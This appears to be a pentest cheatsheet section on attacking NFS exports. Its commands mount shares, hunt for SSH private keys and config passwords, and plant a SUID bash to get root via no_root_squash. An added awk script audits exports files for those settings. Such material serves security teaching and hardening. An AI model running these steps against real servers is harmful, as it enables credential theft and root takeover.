NFS (2049)
Show exports
List NFS shares — Find mountable shares
showmount -e $IP
Example Output
showmount -e 10.10.10.5
/home/backup *(rw,no_root_squash)
/var/www *(ro)
(no_root_squash = privesc possible: root on the client is not remapped to an unprivileged user, so it keeps root rights on the share)
Mount share
Mount and browse — Full file access
mkdir /tmp/nfs
mount -t nfs $IP:/<share> /tmp/nfs
Example Output
mkdir /tmp/nfs
mount -t nfs 10.10.10.5:/home/backup /tmp/nfs
ls /tmp/nfs/
.ssh/ documents/ notes.txt
(Full access to user's home directory)
Check for SSH keys
Private keys — Instant SSH access
ls -la /tmp/nfs/home/*/.ssh/
Example Output
find / -name id_rsa 2>/dev/null
/home/admin/.ssh/id_rsa
cat /home/admin/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA...
(Copy to attacker, chmod 600, ssh -i)
Check for sensitive files
Config files, backups — Passwords in config files
find /tmp/nfs -name '*.conf' -o -name '*.txt' -o -name '*.bak'
Example Output
find /tmp/nfs -name '*.conf' -o -name '*.txt'
/tmp/nfs/notes.txt: 'DB password: MySQLr00t!'
/tmp/nfs/.ssh/id_rsa: -----BEGIN RSA PRIVATE KEY-----
Check permissions / no_root_squash
Privesc via NFS — Write SUID shell, execute on target
If no_root_squash: create SUID binary on share
Example Output
cat /etc/exports shows: no_root_squash
On attacker as root:
cp /bin/bash /tmp/nfs/rootbash
chmod +s /tmp/nfs/rootbash
On target:
/home/backup/rootbash -p
# whoami
root
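Audit the exports (server side)
The script below is an added example, not part of the original cheatsheet: it reads an exports file and flags the settings the steps above depend on (no_root_squash, and shares exported to any host). The function names audit_exports and sample_exports, the severity labels and the sample entries are constructed for illustration. It assumes one export per line, with no line continuations or quoted paths.

```shell
#!/bin/sh
# Added example: flag risky entries in an exports(5)-format file.
# Usage on a server: audit_exports /etc/exports   (reads stdin if no file is given)

audit_exports() {
    awk '
    NF == 0 || $1 ~ /^#/ { next }              # skip blank lines and comments
    {
        path = $1
        for (i = 2; i <= NF; i++) {            # each field is client(options)
            client = $i; opts = ""
            p = index($i, "(")
            if (p > 0) {
                client = substr($i, 1, p - 1)
                opts = substr($i, p + 1, length($i) - p - 1)
            }
            if (client == "") client = "*"     # bare "(opts)" applies to any host
            rw = 0; nrs = 0
            n = split(opts, o, ",")
            for (j = 1; j <= n; j++) {
                if (o[j] == "rw") rw = 1       # ro is the default
                if (o[j] == "no_root_squash") nrs = 1   # root_squash is the default
            }
            if (nrs) print "HIGH " path " " client " no_root_squash"
            if (client == "*" && rw) print "MEDIUM " path " " client " rw-any-host"
            if (client == "*" && !rw) print "LOW " path " " client " ro-any-host"
        }
    }' "$@"
}

# Constructed sample: the first two entries mirror the shares shown above,
# the third is an extra made-up entry with two client specifications.
sample_exports() {
    cat <<'EOF'
# constructed sample exports file
/home/backup *(rw,no_root_squash)
/var/www     *(ro)
/srv/build   10.10.10.0/24(rw,sync) ci01(rw,no_root_squash)
EOF
}

sample_exports | audit_exports
```

To clear the findings, drop no_root_squash from the entry, replace * with the specific client hosts or subnet, and reload with exportfs -ra.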